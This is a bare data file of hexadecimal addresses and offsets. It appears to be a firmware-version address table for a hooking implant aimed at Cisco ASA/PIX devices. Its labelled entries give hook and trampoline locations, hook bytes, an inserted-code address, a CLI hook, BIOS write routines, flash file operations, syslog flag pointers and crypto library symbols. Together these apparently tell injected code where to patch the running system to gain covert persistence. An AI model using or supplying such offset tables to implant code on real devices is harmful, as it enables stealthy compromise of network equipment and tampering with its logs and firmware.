; --- SECTION I ---
;
0x40084100
0x2461000 
0x0   0x08ca6b10
0x1   0x08ca6850
0x2   0x0806dbd0
0x3   0x084efb80
0x4   0x0806e0d0
0x5   0x08b10e20
0x6   0x095051c4
0x7   0x094e25b0
0x8   0x094e1710
0x9   0x094e1850
0xa   0x0806bb60
0xb   0x00000014
0xc   0x00000010
0xd   0x00000098
0xe   0x0000007c
0xf   0x094e4580
0x15  0x08068b40
0x16  0x08069d20
0x17  0x080696f0
0x18  0x08a82310
0x19  0xffffffa0
0x1a  0xffffefc8
0x1b  0x04
0x1c  0x0c
0x1d  0x24
0x1e  0x10
0x1f  0x20
0x20  0x08669330
0x21  0x08669dd0
0x22  0x08668420
0x23  0x0867ab00
0x24  0x089e0b90
0x25  0x089e0290
0x26  0x086664b0
0x27  0x0866bf10
0x28  0x08ae00d0
0x2a  0x68
0x2b  0x60
0x2c  0x44
0x2e  0x000001b4
0x2f  0x0a120be0
0x30  0x0a110560
0x31  0x00000014
0x32  0x00000018
0x33  0x000000e8
0x34  0x0a131cf0
0x35  0x0a28ba34
0x36  0x08ae2060
0x37  0x000000e3
0x38  0x10
0x39  0x00
0x3a  0x00001028
0x3b  0x084f6ba0
0x3c  0x084f6ac0
0x3d  0x084f7330
0x3e  0x084f6d20
0x3f  0x00000040
0x40  0x0a2b7ae0
0x42  0x09501fe2
0x43  0x086568c0
0x44  0x0841340f
0x45  0x01f74280
0x46  0xffffffff
0x47  0x2c
0x49  0x08048000
0x4a  0x09b05e3c
0x52  0x086ab070
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x0888afe0
HookedCall                0x088905a0
JmpLocation               0x09501fe4
InterfaceAddr             0x0a110560
InterfaceLeng             0x000001a8
IntSecurityOffset         0xffffffa0
IntNameOffset             0x00000178
IntNumOffset              0x000000e3
IntVlanOffset             0x10
IntIPOffset               0x18
IntNetmaskOffset          0x1c
FlashClassAddr            0x00000000
CryptoDeviceAddr          0xffffffff
ArpTableAddrPtr           0x09c17b74
NumInterfaces             0x00000000
IfaceStruct2              0x00000000
IfaceStruct2Len           0x00
BiosClassAddr             0x0a2a6f80
BiosWriteAddr1            0x08406320
BiosWriteAddr2            0x0840a490
BiosWriteAddr3            0x08409e80
BiosWriteAddr4            0x0840ad00
BiosWriteOffset           0x00000020
FlashMkdirAddress         0x084f76b0
ASAFlashRmdirAddress      0x08413840
PIXFlashRmdirAddress      0x083fa8d0
ASAFlashRmfileAddress     0x08414a60
PIXFlashRmfileAddress     0x083fab10
FlashDirlistAddress       0x084f6920
FlashGetSizeAddress       0x084f7c50
FlashChmodAddress         0x084f7a00
FlashMoveFileAddress      0x084f7840
FlashGetFileInfoAddress   0x00000000
FlashGetSpaceAddress      0x084f8870
FlashFileInfoSizeOffset   0x0000002c
GetPlatformStringAddr     0x094f58d0
ASARestatFlashFlagAddr    0xffffffff
AnnounceFunc              0x0806dd20
DevIoctlOffset            0x70
DuartTtyAddr              0x09b84b60
CIStartFunc               0x080e8110
CommandListAddr           0x09c72d00
DeviceListPtrAddr         0x0a0843cc
DeviceNextPtrOffset       0x50
StrcmpFuncAddr            0x094e7ce0
SyslogFlagPtrAddr         0x0a43a3e0
PGDGETValue               0x85b00002
PGDPUSHValue              0x85b00003
PGDSETValue               0x85b00000
StdChOffset               0x90
StdErrOffset              0x94
PrivFlagOffset            0x0c
UnameOffset               0x14
EnvPtrOffset              0x9c
SyslogOffset              0x00000d84
Open                      0x0806dbd0
ChannelConfigOffset       0x08
InputModeOffset           0x14
InputModeEsc              0x20
WatchDogTimeout           0x09b075e0
UpTimeCounter             0x0a28ba34
Display_uptime_addr       0x080ef2e0
Inserted_code_addr        0x085e7bab
i2cReadByte               0x094c7b20
i2cWriteByte              0x094c87f0
CLIHookAddress            0x080f1df5
AvailMemoryPtr            0x0a3d5dd8
;
;
srand                     0x094e4560
BN_new                    0x09405290
BN_free                   0x09404f30
BN_mod_exp                0x0943ded0
BN_CTX_new                0x09423550
BN_CTX_free               0x09423940
BN_bin2bn                 0x09405790
BN_bn2bin                 0x094054b0
BN_bn2hex                 0x094261c0
BN_num_bits               0x09405430
DH_p                      0x09b4d860
EVP_CIPHER_CTX_init       0x09409f10
EVP_CipherUpdate          0x0940a6f0
EVP_CIPHER_CTX_cleanup    0x09409eb0
EVP_CipherFinal           0x0940aa90
EVP_CipherInit_ex         0x0940afa0
EVP_aes_128_cbc           0x0940cfd0
slimHookAddr              0x0888afa4
slimTrampoline1           0x08059a81
slimTrampoline2           0x0807bdc1
HookByte1                 0x56
HookBytes2to5             0x6cec8353
InterfaceOffset           0x0000000c
codepageBase              0x00000000
osVerAddr                 0x09b064e0
textSize                  0x01536250
;
; --- END OF SECTION II ---
;
:EOS:
;
